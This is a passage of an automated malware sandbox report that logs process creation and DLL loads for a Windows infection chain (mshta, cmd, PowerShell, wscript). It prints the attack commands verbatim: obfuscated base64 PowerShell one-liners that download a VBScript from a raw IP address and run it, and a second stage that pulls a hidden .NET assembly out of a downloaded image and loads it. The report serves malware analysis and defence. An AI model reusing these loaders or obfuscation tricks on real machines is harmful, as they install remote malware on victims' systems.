lYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovalsJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA5F0.tmp" "c:\Users\user\AppData\Local\Temp\24vqjdjh\CSCC170874EB5994B058785371DF20B8BA.TMP"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: webio.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
        Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
